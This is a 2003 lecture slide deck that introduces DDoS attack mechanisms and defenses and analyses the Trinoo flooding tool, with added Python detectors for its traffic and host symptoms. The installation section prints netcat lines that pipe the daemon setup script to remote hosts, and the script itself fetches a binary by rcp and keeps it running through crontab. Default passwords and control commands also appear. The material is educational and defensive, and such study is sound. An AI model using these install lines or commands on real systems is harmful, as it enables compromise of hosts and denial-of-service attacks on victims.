An Introduction to DDoS
And the “Trinoo” Attack Tool
Prepared by Ray Lam, Ivan Wong
July 10, 2003
Outline

- Background on DDoS
  - Attack mechanism
  - Ways to defend
- The attack tool – Trinoo
  - Introduction
  - Attack scenario
  - Symptoms and defense
  - Weaknesses and next evolution
Background on DDoS
Attack mechanism

Denial-Of-Service

- Flooding-based
  - Send packets to victims to consume
    - Network resources
    - System resources
- Traditional DoS
  - One attacker
- Distributed DoS
  - Countless attackers
Attack Mechanism

(Diagram: attacker A, victim V, third host R)

Direct Attack
- A sends TCP SYN, ICMP, UDP, ... packets to V with R’s address as the source IP address.
- V’s replies (TCP SYN-ACK, TCP RST, ICMP, UDP, ...) go to R.

Reflector Attack
- A sends TCP SYN, ICMP, UDP, ... packets to R with V’s address as the source IP address.
- R’s replies (TCP SYN-ACK, TCP RST, ICMP, UDP, ...) go to V.
Attack Architecture

(Diagram: attacker A controls masters (handlers); masters control agents (daemons or zombies).)

- Direct attack: agents send TCP SYN, ICMP, UDP, ... packets to the victim V (the source IP addresses are usually spoofed).
- Reflector attack: agents send TCP SYN, ICMP, UDP, ... packets to reflectors with V’s address as the source IP address; the reflectors’ replies (TCP SYN-ACK, TCP RST, ICMP, UDP, ...) go to V.
Attack Methods

Attack method      | Attack packets                         | Reply packets
Smurf              | ICMP echo queries to broadcast address | ICMP echo replies
SYN flooding       | TCP SYN packets                        | TCP SYN-ACK packets
RST flooding       | TCP packets to closed ports            | TCP RST packets
ICMP flooding      | ICMP queries                           | ICMP replies
                   | UDP packets to closed ports            | ICMP port unreachable
                   | IP packets with low TTL                | ICMP time exceeded
DNS reply flooding | DNS queries (recursive) to DNS servers | DNS replies
BackScatter Analysis (Moore et al.)

- Measured DoS activity on the Internet
  - TCP (94+ %)
  - UDP (2 %)
  - ICMP (2 %)
- TCP attacks based mainly on SYN flooding
Background on DDoS
Ways to defend

Strategy

Three lines of defense:
- Attack prevention - before the attack
- Attack detection and filtering - during the attack
- Attack source traceback - during and after the attack
Attack prevention

- Protect hosts from installation of masters and agents by attackers
- Scan hosts for symptoms of agents being installed
- Monitor network traffic for known message exchanges among attackers, masters, agents

Attack prevention

- Inadequate and hard to deploy
  - Don’t-care users leave security holes
  - ISP and enterprise networks do not have incentives
Attack source traceback

- Identify the actual origin of a packet without relying on its source IP
- 2 approaches
  - Routers record info about packets
  - Routers send additional info about packets to the destination

Attack source traceback

- Source traceback cannot stop an ongoing DDoS attack
- Cannot trace origins behind firewalls, NAT (network address translators)
- More to do for reflector attacks (attack packets come from legitimate sources)
- Useful in post-attack law enforcement
Attack detection and filtering

- Detection
  - Identify DDoS attack and attack packets
- Filtering
  - Classify normal and attack packets
  - Drop attack packets
Attack detection and filtering

- Can be done in 4 places
  - Victim’s network
  - Victim’s ISP network
  - Further upstream ISP networks
  - Attack source networks
- Dispersed agents send packets to a single victim
  - Like pouring packets from the top of a funnel

Attack detection and filtering

(Funnel diagram: attack source networks at the top, then further upstream ISP networks, the victim’s ISP network, the victim’s network, and the victim at the bottom. Effectiveness of filtering increases toward the attack source networks; effectiveness of detection increases toward the victim.)
Attack detection and filtering

- Detection
  - Easy at victim’s network – large amount of attack packets
  - Difficult at individual agent’s network – small amount of attack packets
- Filtering
  - Effective at agents’ networks – less likely to drop normal packets
  - Ineffective at victim’s network – more normal packets are dropped
D&F at agent’s network

- Usually cannot detect a DDoS attack
- Can filter attack packets with spoofed addresses
  - Attack packets in direct attacks
  - Attack packets from agents to reflectors in reflector attacks
- Ensuring that all ISPs install ingress packet filtering is impossible
D&F at victim’s network

- Detect DDoS attack
  - Unusually high volume of incoming traffic of certain packet types
  - Degraded server and network performance
- Filtering is ineffective
  - Attack and normal packets have the same destination – victim’s IP and port
  - Attack packets have spoofed source IPs or come from many different IPs
  - Attack and normal packets are indistinguishable
D&F at victim’s upstream ISP

- Often requested by the victim to filter attack packets
- Alert protocol
  - Victim cannot receive ACK from ISP
  - Requires strong authentication and encryption
- Filtering ineffective
  - ISP network may also be jammed
D&F at further upstream ISP

- Backpressure approach
  - Victim detects DDoS attack
  - Upstream ISPs filter attack packets
The attack tool – Trinoo
Introduction

Introduction

- Discovered in August 1999
- Daemons found on Solaris 2.x systems
- Attacked a system in the University of Minnesota
  - Victim unusable for 2 days

Attack type

- UDP flooding
  - Default size of UDP packet: 1000 bytes
    - malloc() a buffer of this size and send its uninitialized content
  - Default period of attack: 120 seconds
  - Destination port: randomly chosen from 0 – 65534
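A victim-side detector for the flood signature just described, added here as an example (not code from the slides or from the Trinoo tool): it groups UDP datagrams by source and flags a source that sends many fixed-size datagrams (the 1000-byte default) sprayed across many destination ports within a short window. The packet records and the thresholds are constructed assumptions for the example.

```python
from collections import defaultdict

# Constructed packet records: (timestamp_s, src_ip, dst_port, udp_payload_len).
# The flooding source mimics a Trinoo daemon: fixed 1000-byte datagrams to
# pseudo-random destination ports; the other records are ordinary traffic.
SAMPLE_PACKETS = [
    (0.002 * i, "10.0.0.7", (i * 7919) % 65535, 1000) for i in range(300)
] + [
    (0.5, "192.0.2.10", 53, 60),
    (0.7, "192.0.2.10", 53, 64),
    (0.9, "192.0.2.11", 123, 48),
]

def find_udp_flooders(packets, window_s=1.0, min_pkts=200, min_ports=100,
                      size_ratio=0.9):
    """Return {src_ip: summary} for sources matching a Trinoo-style UDP flood.

    Per source, within the first window_s seconds of its traffic, require
    at least min_pkts datagrams (volume), at least min_ports distinct
    destination ports (random-port spraying) and one payload size making up
    at least size_ratio of the datagrams (Trinoo's fixed rsz, default 1000).
    The thresholds are assumptions for this example, not values from the tool.
    """
    by_src = defaultdict(list)
    for ts, src, dport, plen in packets:
        by_src[src].append((ts, dport, plen))
    hits = {}
    for src, recs in by_src.items():
        recs.sort()
        t0 = recs[0][0]
        in_win = [r for r in recs if r[0] - t0 <= window_s]
        if len(in_win) < min_pkts:
            continue
        ports = {dport for _, dport, _ in in_win}
        sizes = defaultdict(int)
        for _, _, plen in in_win:
            sizes[plen] += 1
        top_size, top_count = max(sizes.items(), key=lambda kv: kv[1])
        if len(ports) >= min_ports and top_count / len(in_win) >= size_ratio:
            hits[src] = {"packets": len(in_win), "ports": len(ports),
                         "size": top_size}
    return hits

if __name__ == "__main__":
    for src, info in find_udp_flooders(SAMPLE_PACKETS).items():
        print(f"UDP flood from {src}: {info}")
```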
The attack tool – Trinoo
Attack scenario

Installation

1. Hack an account
   - Acts as repository
     - Scanning tools, attack tools, Trinoo daemons, Trinoo masters, etc.
   - Requirements
     - High bandwidth connection
     - Large number of users
     - Little administrative oversight
Installation

2. Compromise systems
   - Look for vulnerable systems
     - Remote buffer overflow exploitation
     - Unpatched Sun Solaris and Linux
   - Set up root account
   - Open TCP ports
   - Keep a `friend list`
Installation

3. Install daemons
   - Use “netcat” (“nc”) and “trin.sh”
     ./trin.sh | nc 128.aaa.167.217 1524 &
     ./trin.sh | nc 128.aaa.167.218 1524 &
   - netcat
     - Network version of “cat”
   - trin.sh
     - Shell script to set up daemons
Installation

trin.sh
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
Architecture

- Attacker
- Masters (handlers)
- Agents (daemons or zombies)
- Victim (direct attack)

Communication ports

- Attacker to master: TCP port 27665
- Master to daemon: UDP port 27444
- Daemon to master: UDP port 31335
- Monitor these specific ports to detect the presence of a master or agent
Password protection

- Password is used to prevent administrators or other hackers from taking control
- Encrypted password compiled into master and daemon using crypt()
- Clear-text password is sent over the network – the session is not encrypted
- Received password is encrypted and compared

Password protection

- Default passwords
  - “l44adsl” – trinoo daemon password
  - “gOrave” – trinoo master server startup
  - “betaalmostdone” – trinoo master remote interface password
  - “killme” – trinoo master password to control “mdie” command
Login to master

- Telnet to port 27665 of the host with the master
- Enter password “betaalmostdone”
- Warns if others try to connect to the master

[root@r2 root]# telnet r1 27665
Trying 192.168.249.201...
Connected to r1.router (192.168.249.201).
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo>
Master and daemon

- Communicate by UDP packets
- Command line format
  - arg1 password arg2
  - Default password is “l44adsl”
- When a daemon starts, it sends “HELLO” to the master
- Master maintains a list of daemons
Master commands

- dos IP
  - DoS the IP address specified
  - “aaa l44adsl IP” sent to each daemon
- mdos <ip1:ip2:ip3>
  - DoS the IPs simultaneously
- mtimer N
  - Set attack period to N seconds

Master commands

- bcast
  - List all daemons’ IPs
- mdie password
  - Shut down all daemons
- killdead
  - Invite all daemons to send “HELLO” to master
  - Delete all dead daemons from the list
Daemon commands

- Not used directly; only used by the master to send commands to daemons
- Consist of 3 letters
  - Avoids exposing the commands to the Unix command “strings” run on the binary (by default “strings” prints only sequences of 4 or more characters)

Daemon commands

- aaa password IP
  - DoS the specified IP
- bbb password N
  - Set attack period to N seconds
- rsz password N
  - Set attack packet size to N bytes
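A network-side classifier for the master/daemon exchanges listed on the preceding slides, added as an example (not code from the slides or from Trinoo): it recognises the three control channels by port and parses the clear-text "verb password argument" payload of master-to-daemon commands, which is what an ngrep or tcpdump capture would expose. The sample flows are constructed; the port numbers and default daemon password are those stated on the slides.

```python
import re

# Trinoo control channels from the slides: attacker->master TCP 27665,
# master->daemon UDP 27444, daemon->master UDP 31335. The default daemon
# password "l44adsl" travels in clear text inside the UDP payload.
MASTER_TCP_PORT, DAEMON_UDP_PORT, MASTER_UDP_PORT = 27665, 27444, 31335
DAEMON_PASSWORD = "l44adsl"

# Master-to-daemon command format: three-letter verb, password, argument.
CMD_RE = re.compile(r"^(aaa|bbb|rsz) (\S+) (\S+)$")
CMD_MEANING = {"aaa": "flood target", "bbb": "attack period (s)",
               "rsz": "packet size (bytes)"}

def classify_packet(proto, dport, payload):
    """Return a finding string for a Trinoo control message, or None.
    proto is "tcp" or "udp"; payload is the datagram text as ngrep shows it."""
    if proto == "tcp" and dport == MASTER_TCP_PORT:
        return "attacker->master login channel (tcp/27665)"
    if proto == "udp" and dport == MASTER_UDP_PORT and "HELLO" in payload:
        return "daemon->master HELLO registration (udp/31335)"
    if proto == "udp" and dport == DAEMON_UDP_PORT:
        m = CMD_RE.match(payload)
        if m:
            verb, password, arg = m.groups()
            pw = "default" if password == DAEMON_PASSWORD else "non-default"
            return (f"master->daemon {verb} ({CMD_MEANING[verb]}={arg}, "
                    f"{pw} password, sent in clear text)")
    return None

def scan_flows(flows):
    """flows: iterable of (src, dst, proto, dport, payload) -> list of findings."""
    findings = []
    for src, dst, proto, dport, payload in flows:
        hit = classify_packet(proto, dport, payload)
        if hit:
            findings.append((src, dst, hit))
    return findings

# Constructed sample flows (documentation address ranges), not a real capture.
SAMPLE_FLOWS = [
    ("198.51.100.5", "192.0.2.20", "tcp", 27665, ""),
    ("192.0.2.30", "192.0.2.20", "udp", 31335, "*HELLO*"),
    ("192.0.2.20", "192.0.2.30", "udp", 27444, "aaa l44adsl 203.0.113.9"),
    ("192.0.2.20", "192.0.2.30", "udp", 27444, "bbb l44adsl 120"),
    ("192.0.2.30", "192.0.2.40", "udp", 53, "plain dns"),
]
```

Running `scan_flows(SAMPLE_FLOWS)` yields four findings; the DNS flow is ignored.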
The attack tool – Trinoo
Symptoms and defense

Symptoms

- Masters
  - Crontab
    * * * * * /usr/sbin/rpc.listen
  - Friend list: files “...” and “...-b”

# ls -l ... ...-b
-rw-------   1 root     root           25 Sep 26 14:46 ...
-rw-------   1 root     root           50 Sep 26 14:30 ...-b
Symptoms

- Masters (Con’t)
  - Socket status

# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:27665                 *:*                     LISTEN
...
udp        0      0 *:31335                 *:*
...
Symptoms

- Masters (Con’t)
  - File status

# lsof | egrep ":31335|:27665"
master   1292 root    3u  inet   2460       UDP *:31335
master   1292 root    4u  inet   2461       TCP *:27665 (LISTEN)
# lsof -p 1292
COMMAND  PID  USER  FD   TYPE DEVICE   SIZE  NODE NAME
master   1292 root  cwd  DIR  3,1      1024 14356 /tmp/...
master   1292 root  rtd  DIR  3,1      1024     2 /
master   1292 root  txt  REG  3,1     30492 14357 /tmp/.../master
master   1292 root  mem  REG  3,1    342206 28976 /lib/ld-2.1.1.so
master   1292 root  mem  REG  3,1     63878 29116 /lib/libcrypt-2.1.1.so
Symptoms

- Daemons
  - Socket status

# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
...
udp        0      0 *:1024                  *:*
udp        0      0 *:27444                 *:*
...
Symptoms

- Daemons (Con’t)
  - File status

# lsof | egrep ":27444"
ns       1316 root    3u  inet   2502       UDP *:27444
# lsof -p 1316
COMMAND  PID  USER  FD   TYPE DEVICE    SIZE   NODE NAME
ns       1316 root  cwd  DIR  3,1       1024 153694 /tmp/...
ns       1316 root  rtd  DIR  3,1       1024      2 /
ns       1316 root  txt  REG  3,1       6156 153711 /tmp/.../ns
ns       1316 root  mem  REG  3,1     342206  28976 /lib/ld-2.1.1.so
ns       1316 root  mem  REG  3,1      63878  29116 /lib/libcrypt-2.1.1.so
ns       1316 root  mem  REG  3,1    4016683  29115 /lib/libc-2.1.1.so
Defenses

- Prevent root-level compromise
  - Patch systems
  - Set up firewalls
  - Monitor traffic
- Block abused ports
  - High-numbered UDP ports
  - Trade-off
    - Also blocks normal programs using the same ports
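A host-side check that automates the symptom review from the slides above, added as an example (not code from the slides or from Trinoo): it parses `netstat -a --inet` output for the master and daemon sockets, looks for the crontab entry written by trin.sh, and looks for the friend-list files “...” and “...-b” in the master’s working directory. The sample netstat text, crontab and directory listing are constructed for the example.

```python
import re

# Sockets the symptoms slides associate with Trinoo components.
TRINOO_SOCKETS = {
    ("tcp", 27665): "master remote interface",
    ("udp", 31335): "master (receives daemon HELLO)",
    ("udp", 27444): "daemon command port",
}
CRON_MARKER = "/usr/sbin/rpc.listen"   # crontab entry written by trin.sh

def parse_netstat_inet(text):
    """Parse `netstat -a --inet` output into (proto, local_port, state) tuples.
    Only the needed columns are read; udp rows have no State column."""
    rows = []
    for line in text.splitlines():
        m = re.match(r"^(tcp|udp)\s+\d+\s+\d+\s+\S+:(\d+)\s+\S+(?:\s+(\S+))?", line)
        if m:
            rows.append((m.group(1), int(m.group(2)), m.group(3) or ""))
    return rows

def check_host(netstat_text, crontab_text, master_dir_listing):
    """Return symptom strings for one host (empty list = nothing found)."""
    findings = []
    for proto, port, state in parse_netstat_inet(netstat_text):
        role = TRINOO_SOCKETS.get((proto, port))
        if role:
            where = f" ({state})" if state else ""
            findings.append(f"{proto}/{port} open{where}: possible Trinoo {role}")
    for line in crontab_text.splitlines():
        if CRON_MARKER in line:
            findings.append(f"crontab restarts {CRON_MARKER} every minute: {line.strip()}")
    for name in master_dir_listing:
        if re.fullmatch(r"\.\.\.(-b)?", name):   # friend list "..." and backup "...-b"
            findings.append(f"friend-list file present: {name}")
    return findings

# Constructed sample input modelled on the master symptoms slides (not a real host).
NETSTAT = """Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:27665                 *:*                     LISTEN
tcp        0      0 *:22                    *:*                     LISTEN
udp        0      0 *:31335                 *:*
"""
CRONTAB = "* * * * * /usr/sbin/rpc.listen\n"
MASTER_DIR = ["...", "...-b", "master"]

if __name__ == "__main__":
    for finding in check_host(NETSTAT, CRONTAB, MASTER_DIR):
        print(finding)
```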
The attack tool – Trinoo
Weaknesses and next evolution

Weaknesses

- Single kind of attack
  - UDP flooding
  - Easily defended by single defense tools
- Uses an IP as the destination address
  - “Moving target defense” – victim changes IP to avoid the attack
Weaknesses

- Password, encrypted password, commands visible in binary images
  - Use the Unix command “strings” to obtain them
    - strings master
    - strings -n3 ns
  - Check if Trinoo is found
  - Crack the encrypted passwords
Weaknesses

- Password travels in plain text on the network
  - Daemon password frequently sent in master-to-daemon commands
  - Get the password with “ngrep”, “tcpdump”, which show the UDP payload
Uproot a Trinoo network

- Locate a daemon
- Use “strings” to obtain the IPs of the masters
- Contact the sites with a master installed
- Those sites check their list of daemons
  - By inspecting the file “...”, or by getting the master login password and using the “bcast” command
- Get the “mdie” password
- Use “mdie” to shut down all daemons
  - Repeat “mdie” periodically, as daemons are restarted by crontab
Next evolution

- Combination of several attack types
  - SYN flood, UDP flood, ICMP flood…
  - Higher chance of a successful attack
- Stronger encryption of embedded strings, passwords
- Use an encrypted communication channel
- Communicate by a protocol that is difficult to detect or block, e.g. ICMP
References

- R. Chang, “Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial,” Oct. 2002
- D. Dittrich, “The DoS Project’s ‘Trinoo’ Distributed Denial of Service Attack Tool,” http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt, Oct. 1999
Open Discussion